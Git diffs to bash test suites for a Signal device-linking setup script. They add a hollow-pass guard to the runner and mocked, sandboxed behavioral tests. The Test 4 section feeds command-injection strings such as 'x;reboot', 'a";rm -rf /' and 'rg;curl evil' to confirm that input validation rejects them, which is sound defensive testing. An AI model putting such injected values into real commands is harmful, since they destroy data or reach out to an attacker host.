--- a/amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
@@ -4,7 +4,7 @@
 # Usage:
 #   bash amplifier-bundle/skills/signal-setup/tests/run_all_tests.sh
 #
-# Exit: 0 = all suites passed, non-zero = one or more failures.
+# Exit: 0 = all suites passed AND enough real scenarios ran; non-zero otherwise.
 #
 # Suites:
 #   1. test_skill_structure.sh  — SKILL.md/SECURITY.md contract + script-source
@@ -15,10 +15,24 @@
 #                                 (help, validation, injection fail-closed,
 #                                 idempotency-renders-no-QR, prereq failures).
 #
+# Hollow-pass guard: a suite that silently ran zero assertions (or aborted early
+# before printing its summary) yet still exited 0 must NOT be reported as green.
+# We therefore parse each suite's mandatory "Results: N passed, M failed" line
+# and require:
+#   * every suite emitted exactly one Results line (ran to completion);
+#   * every suite reports passed > 0 and failed == 0;
+#   * the grand total of passing assertions is at least MIN_TOTAL_SCENARIOS.
+#
 # Intentionally omits -e so one failing suite never aborts the runner.
 set -uo pipefail
 
 SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+
+# Minimum number of passing assertions across all suites for the run to be
+# considered substantive rather than a hollow pass. Deliberately well below the
+# current real count (77) to tolerate churn, but far enough above zero that an
+# empty/aborted suite cannot masquerade as success.
+MIN_TOTAL_SCENARIOS="${MIN_TOTAL_SCENARIOS:-40}"
 
 SUITES=(
   "test_skill_structure.sh"
@@ -26,28 +40,68 @@ SUITES=(
 )
 
 TOTAL_FAIL=0
+TOTAL_PASSED=0
+GUARD_FAIL=0
+
 echo "###########################################################"
 echo "#  signal-setup skill — full TDD suite"
 echo "###########################################################"
 for s in "${SUITES[@]}"; do
   echo ""
   echo ">>> Running $s"
-  if bash "$SCRIPT_DIR/$s"; then
-    echo "<<< $s: OK"
+
+  # Capture output so we can both stream it and parse its Results summary.
+  out="$(bash "$SCRIPT_DIR/$s" 2>&1)"
+  rc=$?
+  echo "$out"
+
+  if [[ "$rc" -eq 0 ]]; then
+    echo "<<< $s: exit 0"
   else
-    echo "<<< $s: FAILED"
+    echo "<<< $s: FAILED (exit $rc)"
     TOTAL_FAIL=$((TOTAL_FAIL + 1))
+  fi
+
+  # ── Hollow-pass guard: the suite MUST have printed a Results summary. ──
+  results_line="$(printf '%s\n' "$out" | grep -E '^Results:[[:space:]]*[0-9]+ passed, [0-9]+ failed' | tail -1)"
+  if [[ -z "$results_line" ]]; then
+    echo "!!! GUARD: $s printed no 'Results:' summary — treating as a hollow/aborted run"
+    GUARD_FAIL=$((GUARD_FAIL + 1))
+    continue
+  fi
+
+  suite_passed="$(printf '%s\n' "$results_line" | sed -E 's/^Results:[[:space:]]*([0-9]+) passed.*/\1/')"
+  suite_failed="$(printf '%s\n' "$results_line" | sed -E 's/.* ([0-9]+) failed.*/\1/')"
+  TOTAL_PASSED=$((TOTAL_PASSED + suite_passed))
+
+  if [[ "$suite_passed" -le 0 ]]; then
+    echo "!!! GUARD: $s ran 0 passing assertions — hollow pass"
+    GUARD_FAIL=$((GUARD_FAIL + 1))
+  fi
+  if [[ "$suite_failed" -ne 0 && "$rc" -eq 0 ]]; then
+    echo "!!! GUARD: $s reported $suite_failed failure(s) but exited 0 — inconsistent"
+    GUARD_FAIL=$((GUARD_FAIL + 1))
   fi
 done
 
 echo ""
 echo "###########################################################"
-if [[ "$TOTAL_FAIL" -eq 0 ]]; then
+echo "#  Total passing assertions: $TOTAL_PASSED (floor: $MIN_TOTAL_SCENARIOS)"
+
+if [[ "$TOTAL_PASSED" -lt "$MIN_TOTAL_SCENARIOS" ]]; then
+  echo "!!! GUARD: only $TOTAL_PASSED passing assertions (< $MIN_TOTAL_SCENARIOS) — hollow suite"
+  GUARD_FAIL=$((GUARD_FAIL + 1))
+fi
+
+if [[ "$TOTAL_FAIL" -eq 0 && "$GUARD_FAIL" -eq 0 ]]; then
   echo "#  ALL SUITES PASSED"
 else
-  echo "#  $TOTAL_FAIL SUITE(S) FAILED"
+  [[ "$TOTAL_FAIL" -gt 0 ]] && echo "#  $TOTAL_FAIL SUITE(S) FAILED"
+  [[ "$GUARD_FAIL" -gt 0 ]] && echo "#  $GUARD_FAIL HOLLOW-PASS GUARD VIOLATION(S)"
 fi
 echo "###########################################################"
 
-[[ "$TOTAL_FAIL" -gt 0 ]] && exit 1
+if [[ "$TOTAL_FAIL" -gt 0 || "$GUARD_FAIL" -gt 0 ]]; then
+  exit 1
+fi
 exit 0

--- a/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
@@ -111,6 +111,8 @@ for a in "\$@"; do
 done
 case "\$script" in
   *listAccounts*)
+    [ -n "\${MOCK_AZ_FAIL_LIST:-}" ] && { echo "mock az listAccounts failure" >&2; exit 42; }
+    [ -n "\${MOCK_AZ_INNER_FAIL_LIST:-}" ] && { echo "__SIGNAL_CLI_FAILED__1"; echo "mock signal-cli listAccounts failure"; exit 0; }
     [ -n "\${MOCK_LINKED_NUMBER:-}" ] && echo "Number: \${MOCK_LINKED_NUMBER}" ;;
   *updateGroup*send*)
     echo "POST_TEST_OK" ;;
@@ -124,6 +126,11 @@ EOF
 # Mock nc / qrencode-adjacent tools present but inert.
 cat >"$MOCKBIN/nc" <<'EOF'
 #!/usr/bin/env bash
+payload="$(cat)"
+case "$payload" in
+  *updateGroup*) echo '{"jsonrpc":"2.0","result":{"groupId":"mock-group"},"id":1}' ;;
+  *send*) echo '{"jsonrpc":"2.0","results":[],"timestamp":123,"id":1}' ;;
+esac
 exit 0
 EOF
 
@@ -145,6 +152,9 @@ run_ss() {
     HOME="$SANDBOX" \
     PATH="$MOCKBIN" \
     MOCK_LINKED_NUMBER="${MOCK_LINKED_NUMBER:-}" \
+    MOCK_AZ_FAIL_LIST="${MOCK_AZ_FAIL_LIST:-}" \
+    MOCK_AZ_INNER_FAIL_LIST="${MOCK_AZ_INNER_FAIL_LIST:-}" \
+    SIGNAL_SETUP_TEST_DAEMON_UP="${SIGNAL_SETUP_TEST_DAEMON_UP:-}" \
     /bin/bash "$IMPL" "$@" 2>&1)"
   RC=$?
 }
@@ -312,6 +322,60 @@ if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "Remote daemon reachable; post-te
   pass "remote already-linked path runs daemon/self-group/post-test"
 else
   fail "remote daemon/self-group/post-test must run when daemon step is enabled (rc=$RC): $OUT"
+fi
+
+reset_logs
+SIGNAL_SETUP_TEST_DAEMON_UP=1 MOCK_LINKED_NUMBER="+15551234567" run_ss \
+  --host local --phone +15551234567 -y
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "Post-test OK"; then
+  pass "local already-linked path runs daemon/self-group/post-test"
+else
+  fail "local daemon/self-group/post-test must run when daemon is reachable (rc=$RC): $OUT"
+fi
+
+reset_logs
+MOCK_AZ_FAIL_LIST=1 MOCK_LINKED_NUMBER="+15551234567" run_ss \
+  --host devvm --phone +15551234567 --resource-group rysweet-linux-vm-pool --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "refusing to mint"; then
+  pass "remote account-probe failure aborts instead of minting a fresh link"
+else
+  fail "remote listAccounts failure must abort before minting (rc=$RC): $OUT"
+fi
+if [[ ! -s "$QR_LOG" ]]; then
+  pass "no QR rendered after remote account-probe failure"
+else
+  fail "remote account-probe failure must not render a QR"
+fi
+
+reset_logs
+MOCK_AZ_INNER_FAIL_LIST=1 MOCK_LINKED_NUMBER="+15551234567" run_ss \
+  --host devvm --phone +15551234567 --resource-group rysweet-linux-vm-pool --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "refusing to mint"; then
+  pass "remote signal-cli listAccounts failure aborts even when az exits 0"
+else
+  fail "remote inner signal-cli failure must abort before minting (rc=$RC): $OUT"
+fi
+if [[ ! -s "$QR_LOG" ]]; then
+  pass "no QR rendered after remote signal-cli account-probe failure"
+else
+  fail "remote signal-cli account-probe failure must not render a QR"
+fi
+
+# Regression (Finding 1): --phone set + host NOT yet linked must NOT be
+# mistaken for a probe failure. already_linked() previously leaked exit 1 from
+# a non-matching [[ ]] test, so "$(already_linked)" || die fired the
+# "refusing to mint" abort before the QR could ever be minted. A successful
+# probe that finds no account is SUCCESS with empty output; the run must
+# proceed toward minting (and, in this hermetic sandbox with an inert
+# systemd-run, fail later at "Failed to obtain a link URI"), never at the
+# account probe.
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss \
+  --host local --phone +15551234567 --no-daemon -y
+if echo "$OUT" | grep -qi "refusing to mint"; then
+  fail "phone set + not-linked must not false-abort at the account probe (rc=$RC): $OUT"
+else
+  pass "phone set + not-linked proceeds past probe (no spurious 'refusing to mint')"
 fi
 
 # ─── Test 8: mode auto-detection ────────────────────────────────────────────

--- a/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
@@ -1,0 +1,352 @@
+#!/usr/bin/env bash
+# TDD behavioral tests for signal-setup.sh — the safe, side-effect-free surface.
+#
+# Run: bash amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
+#
+# These exercise the ACTUAL script with a sandboxed HOME and mocked binaries
+# (signal-cli, qrencode, systemd-run, sudo, az, nc) so nothing ever touches the
+# real Signal service, systemd, sudo, or Azure. We deliberately never drive the
+# not-linked *mint* path (which would invoke a real device-link); that behavior
+# is pinned by source-invariant assertions in test_skill_structure.sh instead.
+#
+# What is verified here:
+#   * --help succeeds and prints usage;
+#   * --host is required; unknown flags are rejected;
+#   * strict input validation FAILS CLOSED for command/arg-injection attempts
+#     in --host / --group / --phone / --resource-group;
+#   * valid inputs pass validation;
+#   * idempotency: an already-linked host is a no-op that NEVER renders a QR
+#     (local and remote);
+#   * remote mode genuinely drives the az CLI;
+#   * prerequisite failures (missing signal-cli / qrencode) abort clearly.
+#
+# Each test asserts the exit status AND a content signal so a wrong-reason pass
+# cannot slip through.
+
+set -uo pipefail
+
+PASS=0
+FAIL=0
+pass() { echo "  PASS: $1"; PASS=$((PASS + 1)); }
+fail() { echo "  FAIL: $1"; FAIL=$((FAIL + 1)); }
+
+SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
+SKILL_DIR="$(dirname "$SCRIPT_DIR")"
+IMPL="$SKILL_DIR/scripts/signal-setup.sh"
+
+if [[ ! -x "$IMPL" ]]; then
+  echo "  FAIL: $IMPL is missing or not executable"
+  echo "Results: 0 passed, 1 failed"
+  exit 1
+fi
+
+# --------------------------------------------------------------------------- #
+# Sandbox + mock binaries
+# --------------------------------------------------------------------------- #
+SANDBOX="$(mktemp -d)"
+trap 'rm -rf "$SANDBOX"' EXIT
+MOCKBIN="$SANDBOX/.local/bin"          # signal-setup.sh prepends $HOME/.local/bin
+mkdir -p "$MOCKBIN"
+QR_LOG="$SANDBOX/qrencode.calls"       # touched iff qrencode actually runs
+AZ_LOG="$SANDBOX/az.calls"
+
+# Mock signal-cli: honours --version, listAccounts (linked iff MOCK_LINKED_NUMBER
+# is set), and is a harmless no-op for anything else (e.g. daemon).
+cat >"$MOCKBIN/signal-cli" <<'EOF'
+#!/usr/bin/env bash
+for a in "$@"; do
+  [ "$a" = "--version" ] && { echo "signal-cli 0.14.5"; exit 0; }
+done
+for a in "$@"; do
+  if [ "$a" = "listAccounts" ]; then
+    if [ -n "${MOCK_LINKED_NUMBER:-}" ]; then
+      echo "Number: ${MOCK_LINKED_NUMBER}"
+    fi
+    exit 0
+  fi
+done
+exit 0
+EOF
+
+# Mock qrencode: record every invocation. Its mere execution means a QR was
+# rendered — the tests assert it is ABSENT on the idempotent path.
+cat >"$MOCKBIN/qrencode" <<EOF
+#!/usr/bin/env bash
+echo "qrencode \$*" >> "$QR_LOG"
+exit 0
+EOF
+
+# Mock systemd-run: present-but-inert (idempotent path never mints).
+cat >"$MOCKBIN/systemd-run" <<'EOF'
+#!/usr/bin/env bash
+exit 0
+EOF
+
+# Mock systemctl: reports units inactive.
+cat >"$MOCKBIN/systemctl" <<'EOF'
+#!/usr/bin/env bash
+case "$*" in
+  *is-active*) echo "inactive" ;;
+esac
+exit 0
+EOF
+
+# Mock sudo: transparent passthrough (never reached on the tested paths, but
+# safe if it were).
+cat >"$MOCKBIN/sudo" <<'EOF'
+#!/usr/bin/env bash
+exec "$@"
+EOF
+
+# Mock az: emulate `az vm run-command invoke --scripts <script>`. Prereq probe
+# returns SIGCLI_OK/SYSTEMD_OK; listAccounts returns the linked number.
+cat >"$MOCKBIN/az" <<EOF
+#!/usr/bin/env bash
+echo "az \$*" >> "$AZ_LOG"
+script=""
+prev=""
+for a in "\$@"; do
+  [ "\$prev" = "--scripts" ] && script="\$a"
+  prev="\$a"
+done
+case "\$script" in
+  *listAccounts*)
+    [ -n "\${MOCK_LINKED_NUMBER:-}" ] && echo "Number: \${MOCK_LINKED_NUMBER}" ;;
+  *"test -x"*|*SIGCLI_OK*)
+    echo "SIGCLI_OK"; echo "SYSTEMD_OK" ;;
+  *) : ;;
+esac
+exit 0
+EOF
+
+# Mock nc / qrencode-adjacent tools present but inert.
+cat >"$MOCKBIN/nc" <<'EOF'
+#!/usr/bin/env bash
+exit 0
+EOF
+
+chmod +x "$MOCKBIN"/*
+
+# Curated real tools symlinked into MOCKBIN so we can run with PATH=$MOCKBIN
+# ONLY. This is what makes the sandbox hermetic: without it, a real system
+# qrencode (or signal-cli) on /usr/bin would leak in and defeat the
+# missing-prerequisite tests.
+for t in bash env grep sed seq sleep date hostname rm head cat timeout tr; do
+  real="$(command -v "$t" 2>/dev/null)" || continue
+  ln -sf "$real" "$MOCKBIN/$t"
+done
+
+# Run the script under the sandbox with a hermetic PATH. Extra env/args pass
+# through.  Usage: run_ss <args...>  ; captures OUT (stdout+stderr) and RC.
+run_ss() {
+  OUT="$(env -i \
+    HOME="$SANDBOX" \
+    PATH="$MOCKBIN" \
+    MOCK_LINKED_NUMBER="${MOCK_LINKED_NUMBER:-}" \
+    /bin/bash "$IMPL" "$@" 2>&1)"
+  RC=$?
+}
+
+reset_logs() { : >"$QR_LOG"; : >"$AZ_LOG"; }
+
+echo "═══════════════════════════════════════════════════════"
+echo "  Test Suite: signal-setup.sh — Behavior (mocked)"
+echo "═══════════════════════════════════════════════════════"
+
+# ─── Test 1: --help ─────────────────────────────────────────────────────────
+echo ""
+echo "Test 1: --help prints usage and exits 0"
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss --help
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "USAGE"; then
+  pass "--help exits 0 and prints USAGE"
+else
+  fail "--help must exit 0 and print USAGE (rc=$RC)"
+fi
+
+# ─── Test 2: --host is required ─────────────────────────────────────────────
+echo ""
+echo "Test 2: missing --host aborts non-zero"
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "host"; then
+  pass "missing --host fails with a message about host"
+else
+  fail "missing --host must abort non-zero with a host message (rc=$RC)"
+fi
+
+# ─── Test 3: unknown flag is rejected ───────────────────────────────────────
+echo ""
+echo "Test 3: unknown argument is rejected"
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss --host local --bogus-flag
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "unknown"; then
+  pass "unknown flag rejected non-zero"
+else
+  fail "unknown flag must be rejected (rc=$RC)"
+fi
+
+# ─── Test 4: injection fails closed (the security contract) ─────────────────
+echo ""
+echo "Test 4: input validation FAILS CLOSED against injection"
+
+# host injection
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss --host 'x;reboot' -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "invalid"; then
+  pass "malicious --host rejected"
+else
+  fail "malicious --host must be rejected (rc=$RC)"
+fi
+if [[ ! -s "$QR_LOG" ]]; then
+  pass "no QR rendered for a rejected host"
+else
+  fail "a rejected host must not reach QR rendering"
+fi
+
+# host with command substitution (payload MUST stay literal, not expand)
+reset_logs
+# shellcheck disable=SC2016
+MOCK_LINKED_NUMBER="" run_ss --host '$(touch /tmp/pwn)' -y
+if [[ "$RC" -ne 0 ]]; then
+  pass "--host with \$(...) rejected"
+else
+  fail "--host with command substitution must be rejected (rc=$RC)"
+fi
+
+# group injection
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss --host local --group 'a";rm -rf /' -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "invalid"; then
+  pass "malicious --group rejected"
+else
+  fail "malicious --group must be rejected (rc=$RC)"
+fi
+
+# resource-group injection
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss --host somevm --resource-group 'rg;curl evil' -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "invalid"; then
+  pass "malicious --resource-group rejected"
+else
+  fail "malicious --resource-group must be rejected (rc=$RC)"
+fi
+
+# phone: non-E.164
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss --host local --phone '15551234567' -y   # missing +
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "invalid"; then
+  pass "non-E.164 --phone rejected (missing +)"
+else
+  fail "non-E.164 --phone must be rejected (rc=$RC)"
+fi
+
+reset_logs
+MOCK_LINKED_NUMBER="" run_ss --host local --phone '+1555;evil' -y
+if [[ "$RC" -ne 0 ]]; then
+  pass "--phone with metacharacters rejected"
+else
+  fail "--phone with metacharacters must be rejected (rc=$RC)"
+fi
+
+# ─── Test 5: valid inputs pass validation (reach prereqs/idempotency) ───────
+echo ""
+echo "Test 5: valid inputs pass validation"
+
+# A valid group name WITH a space is allowed by the documented charset; paired
+# with an already-linked host so we exit cleanly without minting.
+reset_logs
+MOCK_LINKED_NUMBER="+15551234567" run_ss \
+  --host local --phone +15551234567 --group "amplihack test" --no-daemon -y
+if [[ "$RC" -eq 0 ]]; then
+  pass "valid --group (with space) + valid --phone accepted"
+else
+  fail "valid inputs must pass validation (rc=$RC): $OUT"
+fi
+
+# ─── Test 6: idempotency (LOCAL) — already linked is a no-op, NO QR ─────────
+echo ""
+echo "Test 6: LOCAL idempotency — already-linked host renders NO QR"
+reset_logs
+MOCK_LINKED_NUMBER="+15551234567" run_ss \
+  --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "already linked"; then
+  pass "already-linked local host reports 'already linked' and exits 0"
+else
+  fail "already-linked local host must be a clean no-op (rc=$RC): $OUT"
+fi
+if [[ ! -s "$QR_LOG" ]]; then
+  pass "no QR rendered when already linked (idempotent)"
+else
+  fail "an already-linked host must NOT render a QR (found: $(cat "$QR_LOG"))"
+fi
+
+# ─── Test 7: idempotency (REMOTE) — uses az, renders NO QR ──────────────────
+echo ""
+echo "Test 7: REMOTE idempotency — drives az CLI, renders NO QR"
+reset_logs
+MOCK_LINKED_NUMBER="+15551234567" run_ss \
+  --host devvm --phone +15551234567 --resource-group rysweet-linux-vm-pool --no-daemon -y
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "already linked"; then
+  pass "already-linked remote host reports 'already linked' and exits 0"
+else
+  fail "already-linked remote host must be a clean no-op (rc=$RC): $OUT"
+fi
+if grep -q 'run-command' "$AZ_LOG" 2>/dev/null; then
+  pass "remote path invoked 'az vm run-command'"
+else
+  fail "remote path must invoke az vm run-command (az.calls: $(cat "$AZ_LOG" 2>/dev/null))"
+fi
+if [[ ! -s "$QR_LOG" ]]; then
+  pass "no QR rendered for an already-linked remote host"
+else
+  fail "already-linked remote host must NOT render a QR"
+fi
+
+# ─── Test 8: mode auto-detection ────────────────────────────────────────────
+echo ""
+echo "Test 8: --host local => local mode (no az); named host => remote (az)"
+
+# local: az must NOT be touched at all
+reset_logs
+MOCK_LINKED_NUMBER="+15551234567" run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ ! -s "$AZ_LOG" ]]; then
+  pass "local mode never invokes az"
+else
+  fail "local mode must not invoke az (az.calls: $(cat "$AZ_LOG"))"
+fi
+
+# ─── Test 9: prerequisite failures abort clearly ────────────────────────────
+echo ""
+echo "Test 9: missing prerequisites abort with a clear message"
+
+# Remove qrencode from the sandbox -> local prereq check must fail.
+mv "$MOCKBIN/qrencode" "$SANDBOX/qrencode.bak"
+reset_logs
+MOCK_LINKED_NUMBER="+15551234567" run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "qrencode"; then
+  pass "missing qrencode aborts with a qrencode message"
+else
+  fail "missing qrencode must abort clearly (rc=$RC): $OUT"
+fi
+mv "$SANDBOX/qrencode.bak" "$MOCKBIN/qrencode"
+
+# Remove signal-cli -> local prereq check must fail.
+mv "$MOCKBIN/signal-cli" "$SANDBOX/signal-cli.bak"
+reset_logs
+MOCK_LINKED_NUMBER="+15551234567" run_ss --host local --phone +15551234567 --no-daemon -y
+if [[ "$RC" -ne 0 ]] && echo "$OUT" | grep -qi "signal-cli"; then
+  pass "missing signal-cli aborts with a signal-cli message"
+else
+  fail "missing signal-cli must abort clearly (rc=$RC): $OUT"
+fi
+mv "$SANDBOX/signal-cli.bak" "$MOCKBIN/signal-cli"
+
+# ─── Summary ─────────────────────────────────────────────────────────────────
+echo ""
+echo "═══════════════════════════════"
+echo "Results: $PASS passed, $FAIL failed"
+echo "═══════════════════════════════"
+
+[[ "$FAIL" -gt 0 ]] && exit 1
+exit 0

--- a/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
@@ -112,6 +112,8 @@ done
 case "\$script" in
   *listAccounts*)
     [ -n "\${MOCK_LINKED_NUMBER:-}" ] && echo "Number: \${MOCK_LINKED_NUMBER}" ;;
+  *updateGroup*send*)
+    echo "POST_TEST_OK" ;;
   *"test -x"*|*SIGCLI_OK*)
     echo "SIGCLI_OK"; echo "SYSTEMD_OK" ;;
   *) : ;;
@@ -301,6 +303,15 @@ if [[ ! -s "$QR_LOG" ]]; then
   pass "no QR rendered for an already-linked remote host"
 else
   fail "already-linked remote host must NOT render a QR"
+fi
+
+reset_logs
+MOCK_LINKED_NUMBER="+15551234567" run_ss \
+  --host devvm --phone +15551234567 --resource-group rysweet-linux-vm-pool -y
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "Remote daemon reachable; post-test OK"; then
+  pass "remote already-linked path runs daemon/self-group/post-test"
+else
+  fail "remote daemon/self-group/post-test must run when daemon step is enabled (rc=$RC): $OUT"
 fi
 
 # ─── Test 8: mode auto-detection ────────────────────────────────────────────

--- a/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
@@ -166,7 +166,7 @@ chmod +x "$MOCKBIN"/*
 # ONLY. This is what makes the sandbox hermetic: without it, a real system
 # qrencode (or signal-cli) on /usr/bin would leak in and defeat the
 # missing-prerequisite tests.
-for t in bash env grep sed seq sleep date hostname id rm head cat timeout tr touch; do
+for t in bash env grep sed seq sleep date hostname id rm head tail cat timeout tr touch; do
   real="$(command -v "$t" 2>/dev/null)" || continue
   ln -sf "$real" "$MOCKBIN/$t"
 done

--- a/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
+++ b/amplifier-bundle/skills/signal-setup/tests/test_script_behavior.sh
@@ -5,9 +5,12 @@
 #
 # These exercise the ACTUAL script with a sandboxed HOME and mocked binaries
 # (signal-cli, qrencode, systemd-run, sudo, az, nc) so nothing ever touches the
-# real Signal service, systemd, sudo, or Azure. We deliberately never drive the
-# not-linked *mint* path (which would invoke a real device-link); that behavior
-# is pinned by source-invariant assertions in test_skill_structure.sh instead.
+# real Signal service, systemd, sudo, or Azure. The not-linked *mint* path IS
+# driven end-to-end here, but only through the mocked systemd-run (local) and
+# mocked az (remote): the mocks synthesise an sgnl:// URI and a post-mint linked
+# account, so no real device-link is ever performed and no Signal/Azure endpoint
+# is contacted. Source-level invariants for the mint path are additionally
+# pinned by test_skill_structure.sh.
 #
 # What is verified here:
 #   * --help succeeds and prints usage;
@@ -18,6 +21,9 @@
 #   * idempotency: an already-linked host is a no-op that NEVER renders a QR
 #     (local and remote);
 #   * remote mode genuinely drives the az CLI;
+#   * the mint path (LOCAL via mocked systemd-run, REMOTE via mocked az) renders
+#     the QR with ANSIUTF8i, verifies the freshly-minted linkage, and completes;
+#   * a failed account probe aborts BEFORE minting ("refusing to mint");
 #   * prerequisite failures (missing signal-cli / qrencode) abort clearly.
 #
 # Each test asserts the exit status AND a content signal so a wrong-reason pass
@@ -61,6 +67,8 @@ for a in "$@"; do
   if [ "$a" = "listAccounts" ]; then
     if [ -n "${MOCK_LINKED_NUMBER:-}" ]; then
       echo "Number: ${MOCK_LINKED_NUMBER}"
+    elif [ -n "${MOCK_LINK_AFTER_MINT_FILE:-}" ] && [ -f "$MOCK_LINK_AFTER_MINT_FILE" ]; then
+      echo "Number: +15551234567"
     fi
     exit 0
   fi
@@ -79,6 +87,11 @@ EOF
 # Mock systemd-run: present-but-inert (idempotent path never mints).
 cat >"$MOCKBIN/systemd-run" <<'EOF'
 #!/usr/bin/env bash
+if [ -n "${MOCK_SYSTEMD_MINT:-}" ]; then
+  uri_file="${@: -1}"
+  echo "sgnl://mock-local-link" > "$uri_file"
+  [ -n "${MOCK_LINK_AFTER_MINT_FILE:-}" ] && touch "$MOCK_LINK_AFTER_MINT_FILE"
+fi
 exit 0
 EOF
 
@@ -95,6 +108,8 @@ EOF
 # safe if it were).
 cat >"$MOCKBIN/sudo" <<'EOF'
 #!/usr/bin/env bash
+[ "$1" = "-n" ] && shift
+[ "$1" = "true" ] && exit 0
 exec "$@"
 EOF
 
@@ -113,7 +128,16 @@ case "\$script" in
   *listAccounts*)
     [ -n "\${MOCK_AZ_FAIL_LIST:-}" ] && { echo "mock az listAccounts failure" >&2; exit 42; }
     [ -n "\${MOCK_AZ_INNER_FAIL_LIST:-}" ] && { echo "__SIGNAL_CLI_FAILED__1"; echo "mock signal-cli listAccounts failure"; exit 0; }
-    [ -n "\${MOCK_LINKED_NUMBER:-}" ] && echo "Number: \${MOCK_LINKED_NUMBER}" ;;
+    if [ -n "\${MOCK_LINKED_NUMBER:-}" ]; then
+      echo "Number: \${MOCK_LINKED_NUMBER}"
+    elif [ -n "\${MOCK_LINK_AFTER_MINT_FILE:-}" ] && [ -f "\$MOCK_LINK_AFTER_MINT_FILE" ]; then
+      echo "Number: +15551234567"
+    fi ;;
+  *URI_START*)
+    if [ -n "\${MOCK_REMOTE_MINT:-}" ]; then
+      [ -n "\${MOCK_LINK_AFTER_MINT_FILE:-}" ] && touch "\$MOCK_LINK_AFTER_MINT_FILE"
+      echo "URI_START"; echo "sgnl://mock-remote-link"; echo "URI_END"
+    fi ;;
   *updateGroup*send*)
     echo "POST_TEST_OK" ;;
   *"test -x"*|*SIGCLI_OK*)
@@ -140,7 +164,7 @@ chmod +x "$MOCKBIN"/*
 # ONLY. This is what makes the sandbox hermetic: without it, a real system
 # qrencode (or signal-cli) on /usr/bin would leak in and defeat the
 # missing-prerequisite tests.
-for t in bash env grep sed seq sleep date hostname rm head cat timeout tr; do
+for t in bash env grep sed seq sleep date hostname id rm head cat timeout tr touch; do
   real="$(command -v "$t" 2>/dev/null)" || continue
   ln -sf "$real" "$MOCKBIN/$t"
 done
@@ -154,6 +178,9 @@ run_ss() {
     MOCK_LINKED_NUMBER="${MOCK_LINKED_NUMBER:-}" \
     MOCK_AZ_FAIL_LIST="${MOCK_AZ_FAIL_LIST:-}" \
     MOCK_AZ_INNER_FAIL_LIST="${MOCK_AZ_INNER_FAIL_LIST:-}" \
+    MOCK_SYSTEMD_MINT="${MOCK_SYSTEMD_MINT:-}" \
+    MOCK_REMOTE_MINT="${MOCK_REMOTE_MINT:-}" \
+    MOCK_LINK_AFTER_MINT_FILE="$SANDBOX/linked-after-mint" \
     SIGNAL_SETUP_TEST_DAEMON_UP="${SIGNAL_SETUP_TEST_DAEMON_UP:-}" \
     /bin/bash "$IMPL" "$@" 2>&1)"
   RC=$?
@@ -293,6 +320,34 @@ else
   fail "an already-linked host must NOT render a QR (found: $(cat "$QR_LOG"))"
 fi
 
+# ─── Test 6b: idempotency must NOT match on a phone-number PREFIX ────────────
+# Regression: a host linked to +155512345678 must NOT be treated as "already
+# linked" when the caller passes the prefix --phone +15551234567. The old
+# substring test (*"Number: $PHONE"*) matched prefixes, skipped minting, and
+# reported/used the wrong (unlinked) number for the daemon/send steps.
+echo ""
+echo "Test 6b: prefix phone number must NOT be mistaken for an exact match"
+reset_logs
+MOCK_LINKED_NUMBER="+155512345678" run_ss \
+  --host local --phone +15551234567 --no-daemon -y
+if echo "$OUT" | grep -qi "already linked"; then
+  fail "prefix --phone +15551234567 must NOT match linked +155512345678 (rc=$RC): $OUT"
+else
+  pass "prefix phone number is not mistaken for an already-linked exact match"
+fi
+
+# ─── Test 6c: exact phone match still reports already-linked ─────────────────
+echo ""
+echo "Test 6c: exact phone match is still recognised as already-linked"
+reset_logs
+MOCK_LINKED_NUMBER="+155512345678" run_ss \
+  --host local --phone +155512345678 --no-daemon -y
+if [[ "$RC" -eq 0 ]] && echo "$OUT" | grep -qi "already linked"; then
+  pass "exact --phone match reports already linked (no false negative from the fix)"
+else
+  fail "exact --phone match must still be recognised as already linked (rc=$RC): $OUT"
+fi
+
 # ─── Test 7: idempotency (REMOTE) — uses az, renders NO QR ──────────────────
 echo ""
 echo "Test 7: REMOTE idempotency — drives az CLI, renders NO QR"
@@ -376,6 +431,36 @@ if echo "$OUT" | grep -qi "refusing to mint"; then
   fail "phone set + not-linked must not false-abort at the account probe (rc=$RC): $OUT"
 else
